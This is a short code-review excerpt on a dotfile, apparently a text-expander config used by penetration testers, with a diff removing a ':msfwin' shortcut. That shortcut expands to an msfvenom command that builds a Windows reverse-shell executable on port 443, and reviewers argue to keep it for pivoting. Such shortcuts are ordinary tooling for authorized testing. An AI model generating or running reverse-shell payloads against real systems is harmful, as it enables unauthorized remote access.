dots/base.yml

```diff
@@ -47,58 +57,68 @@ matches:
       python3 -m http.server 80
 
   - trigger: ":msfwin"
-    replace: msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 -f exe -o shell.exe LHOST=
```

Comment:
original is so much better, LHOST=:ip logic its not always going to be the same, especially when we pivot. i dont like this.

Reply:
also port 443 > always